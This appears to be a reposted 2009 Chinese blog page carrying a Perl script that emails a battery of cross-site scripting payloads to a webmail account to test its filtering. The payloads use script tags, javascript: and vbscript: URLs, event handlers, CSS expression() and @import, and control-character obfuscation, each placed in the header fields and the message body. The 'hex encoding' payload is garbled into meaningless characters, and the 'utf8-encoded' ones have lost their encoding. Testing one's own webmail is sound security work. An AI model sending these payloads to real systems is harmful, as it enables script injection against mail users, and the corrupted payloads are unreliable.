|
mail XSS的脚本
|
|
来源:http://hi.baidu.com/zrxc/blog 作者:zrxc 发布时间:2009-07-06
|
|
#!/usr/bin/perl
use Getopt::Std;
use Net::SMTP;
use strict;
=head1 NAME
excess - A script for testing webmail systems for cross-site scripting problems
=head1 DESCRIPTION
This script sends a number of HTML-formatted email messages to a specified
email address. In order to test a webmail system you need to have an email
account on the system, run this script to send messages to that account,
and then view the received messages through the webmail interface. If you
get a popup box saying "XSS!" it means that your webmail system failed
to block the attack.
Try viewing the messages in several different browsers, including Internet
Explorer and Mozilla Firefox. Some attacks work in one browser, but don't
work in another.
=head1 OPTIONS
=over
=item -t you@webmail.example.com The destination email address
=item -f return-address@example.com From email address. Replies and rejects will go to that address.
=item -s mymailserver.example.com SMTP server to use for sending messages.
=back
=cut
my %opts;
getopts('t:s:f:', \%opts);
my $to = $opts{'t'} || die "No destination address specified";
my $from = $opts{'f'} || die "No from address specified";
my $server = $opts{'s'} || die "No SMTP server specified";
my @test_messages = (
<<END
From: <script>alert("XSS in From: (plain JavaScript)");</script>
To: <script>alert("XSS in To: (plain JavaScript)");</script>
Date: <script>alert("XSS in Date: (plain JavaScript)");</script>
Subject: <script>alert("XSS in Subject: (plain JavaScript)");</script>
Content-type: text/html
<html>
<body>
<h1> Plain JavaScript </h1>
<script language="JavaScript">
alert("XSS in message body (plain JavaScript)!");
</script>
</body>
</html>
END
,
<<END
From: <img src="javascript:alert(\"XSS in From: (javascript url in img src )\")">
To: <img src="javascript:alert(\"XSS in To: (javascript url in img src )\")">
Subject: <img src="javascript:alert(\"XSS in Subject: (javascript url in img src )\")">
Date: <img src="javascript:alert(\"XSS in Date: (javascript url in img src )\")">
Content-type: text/html
<html>
<body>
<h1> Javascript URL in img src </h1>
<img src="javascript:alert(\"XSS in message body (javascript url in img src)\")">
</body>
</html>
END
,
<<END
From: <body ONLOAD=alert('XSS in From: (body onload handler)')>
To: <body ONLOAD=alert('XSS in To: (body onload handler)')>
Subject: <body ONLOAD=alert('XSS in Subject: (body onload handler)')>
Date: <body ONLOAD=alert('XSS in Date: (body onload handler)')>
Content-type: text/html
<html>
<body ONLOAD=alert('XSS in message body (body onload handler)')>
<h1> JavaScript in body onload event handler </h1>
</body>
</html>
END
,
<<END
From: <img src="http://invalidhostname/" onerror="alert('XSS in From (image onerror handler)')">
To: <img src="http://invalidhostname/" onerror="alert('XSS in To (image onerror handler)')">
Date: <img src="http://invalidhostname/" onerror="alert('XSS in Date (image onerror handler)')">
Subject: <img src="http://invalidhostname/" onerror="alert('XSS in Subject (image onerror handler)')">
Content-type: text/html
<html>
<body>
<h1> JavaScript in image onerror handler </h1>
<img src="http://invalidhostname/" onerror="alert('XSS in message body (image onerror handler')">
</body>
</html>
END
,
<<END
From: <p onmouseover="alert('XSS in From: (onmouseover handler)')">
To: <p onmouseover="alert('XSS in To: (onmouseover handler)')">
Date: <p onmouseover="alert('XSS in Date: (onmouseover handler)')">
Subject: <p onmouseover="alert('XSS in Subject: (onmouseover handler)')">
Content-type: text/html
<html>
<body>
<h1> JavaScript in onmouseover handler </h1>
<p onmouseover="alert('XSS in message body (onmouseover handler)')">
Move the mouse pointer over this text. Thanks.
</p>
</body>
</html>
END
,
<<END
From: <img src=javascript:alert('XSS in From: (utf8-encoded URL)')>
To: <img src=javascript:alert('XSS in To: (utf8-encoded URL)')>
Subject: <img src=javascript:alert('XSS in Subject: (utf8-encoded URL)')>
Date: <mg src=javascript:alert('XSS in Date: (utf8-encoded URL)')>
Content-type: text/html
<html>
<body>
<h1> JavaScript in UTF8-encoded URL </h1>
<IMG SRC=javascript:alert('XSS in message body: (utf8-encoded URL)')>
</body>
</html>
END
,
<<END
From: <img src=javascript:alert('XSS in From: (long utf8-encoded URL)')>
To: <img src=javascript:alert('XSS in To: (long utf8-encoded URL)')>
Subject: <img src=javascript:alert('XSS in Subject: (long utf8-encoded URL)')>
Date: <img src=javascript:alert('XSS in Date: (long utf8-encoded URL)')>
Content-type: text/html
<html>
<BODY>
<h1>JavaScript in long UTF8 encoding</h1>
<IMG SRC=javascript:alert('XSS in message body (long utf8-encoded URL)')>
</body>
</html>
END
,
<<END
From: <img src=a=L=I?HEFJa=cAHJ:55Ee.HfdaDANdAe?f@A@74c>
To: <img src=a=L=I?HEFJa=cAHJ:55Ee6faDANdAe?f@A@74c>
Subject: <img src=a=L=I?HEFJa=cAHJ:55Ee5K>aA?JaDANdAe?f@A@74c>
Date: <img src=a=L=I?HEFJa=cAHJ:55Ee,=JAaDANdAe?f@A@74c>
Content-type: text/html
<html>
<BODY>
<h1>JavaScript URL in hex encoding</h1>
<IMG SRC=a=L=I?HEFJa=cAHJ:55EedAII=CA>f@ODANdAe?f@A@74c>
</body>
</html>
END
,
<<END
From: <IMG SRC="jav\	ascript:alert('XSS in From: (URL broken up by 0x09 character)');">
To: <IMG SRC="jav\	ascript:alert('XSS in To: (URL broken up by 0x09 character)');">
Date: <IMG SRC="jav\	ascript:alert('XSS in Date: (URL broken up by 0x09 character)');">
Subject: <IMG SRC="jav\	ascript:alert('XSS in Subject: (URL broken up by 0x09 character)');">
Content-type: text/html
<html>
<BODY>
<h1>JavaScript URL broken up by 0x09 character</h1>
<IMG SRC="jav\	ascript:alert('XSS in message body (URL broken up by 0x09 character)');">
</body>
</html>
END
,
<<END
From: <img src="jav\
ascript:alert('XSS in From: (URL broken up by 0x0A character)');">
To: <img src="jav\
ascript:alert('XSS in To: (URL broken up by 0x0A character)');">
Date: <img src="jav\
ascript:alert('XSS in Date: (URL broken up by 0x0A character)');">
Subject: <img src="jav\
ascript:alert('XSS in Subject: (URL broken up by 0x0A character)');">
Content-type: text/html
<html>
<BODY>
<h1>JavaScript URL broken up by 0x0A character</h1>
<img src="jav\
ascript:alert('XSS in message body (URL broken up by 0x0A character)');">
</body>
</html>
END
,
<<END
From: <img src="jav\
ascript:alert('XSS in From: (URL broken up by 0x0D character)');">
To: <img src="jav\
ascript:alert('XSS in To: (URL broken up by 0x0D character)');">
Date: <img src="jav\
ascript:alert('XSS in Date: (URL broken up by 0x0D character)');">
Subject: <img src="jav\
ascript:alert('XSS in Subject: (URL broken up by 0x0D character)');">
Content-type: text/html
<html>
<BODY>
<h1>JavaScript URL broken up by 0x0D character</h1>
<img src="jav\
ascript:alert('XSS in message body (URL broken up by 0x0D character)');">
</body>
</html>
END
,
<<END
From: <img src="jav\x00ascript:alert('XSS in From: (URL broken up by 0x00 character)');">
To: <img src="jav\x00ascript:alert('XSS in To: (URL broken up by 0x00 character)');">
Date: <img src="jav\x00ascript:alert('XSS in Date: (URL broken up by 0x00 character)');">
Subject: <img src="jav\x00ascript:alert('XSS in Subject: (URL broken up by 0x00 character)');">
Content-type: text/html
<html>
<BODY>
<h1>JavaScript URL broken up by 0x00 character</h1>
<IMG SRC="jav\x00ascript:alert('XSS in message body (URL broken up by 0x00 character)">
</body>
</html>
END
,
<<END
From: <IMG SRC='vbscript:msgbox("XSS in From: (vbscript)")'>
To: <IMG SRC='vbscript:msgbox("XSS in To: (vbscript)")'>
Date: <IMG SRC='vbscript:msgbox("XSS in Date: (vbscript)")'>
Subject: <IMG SRC='vbscript:msgbox("XSS in Subject: (vbscript)")'>
Content-type: text/html
<html>
<BODY>
<h1>VBScript</h1>
<IMG SRC='vbscript:msgbox("XSS in message body (vbscript)")'>
</body>
</html>
END
,
<<END
From: <DIV STYLE="width: expression(alert('XSS in From: (style using expression)'));"></DIV>
To: <DIV STYLE="width: expression(alert('XSS in To: (style using expression)'));"></DIV>
Date: <DIV STYLE="width: expression(alert('XSS in Date: (style using expression)'));"></DIV>
Subject: <DIV STYLE="width: expression(alert('XSS in Subject: (style using expression)'));"></DIV>
Content-type: text/html
<html>
<BODY>
<h1>JavaScript in STYLE tag through expression()</h1>
<DIV STYLE="width: expression(alert('XSS in message body (style using expression)'));"></DIV>
</body>
</html>
END
,
<<END
From: <STYLE>\@im\\port'\\ja\\vasc\\ript:alert("XSS in From: (style using import)")';</STYLE>
To: <STYLE>\@im\\port'\\ja\\vasc\\ript:alert("XSS in To: (style using import)")';</STYLE>
Date: <STYLE>\@im\\port'\\ja\\vasc\\ript:alert("XSS in Date: (style using import)")';</STYLE>
Subject: <STYLE>\@im\\port'\\ja\\vasc\\ript:alert("XSS in Subject: (style using import)")';</STYLE>
Content-type: text/html
<html>
<BODY>
<h1>JavaScript in STYLE tag through \@import</h1>
<STYLE>\@im\\port'\\ja\\vasc\\ript:alert("XSS in message body (style using import)")';</STYLE>
</body>
</html>
END
,
<<END
From: <IMG STYLE='xss: expre\\ssion(alert("XSS in From: (image style)"))'>
To: <IMG STYLE='xss: expre\\ssion(alert("XSS in To: (image style)"))'>
Date: <IMG STYLE='xss: expre\\ssion(alert("XSS in Date: (image style)"))'>
Subject: <IMG STYLE='xss: expre\\ssion(alert("XSS in Subject: (image style)"))'>
Content-type: text/html
<html>
<BODY>
<h1>JavaScript in IMAGE style</h1>
<IMG STYLE='
xss:
expre\\ssion(alert("XSS in message body (image style)"))'>
</body>
</html>
END
);
foreach my $message (@test_messages) {
if(my $error = send_message($message)) { # Returns undef on success, error message on failure
die $error;
}
}
print "Successfully sent " . scalar(@test_messages) . " mesasges.\n";
print "Now go and view them using the webmail system you are testing\n";
sub send_message($) {
my $message = shift;
my $smtp = Net::SMTP->new($server);
$smtp->mail($from) || return "MAIL FROM command failed: " . $smtp->message();
$smtp->to($to) || return "RCPT TO commmand failed: " . $smtp->message();
$smtp->data() || return "DATA commmand failed: " . $smtp->message();
$smtp->datasend($message) || return "Sending message data failed: " . $smtp->message();
$smtp->dataend || return "Sending message data failed: " . $smtp->message();
$smtp->quit;
return undef;
}
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
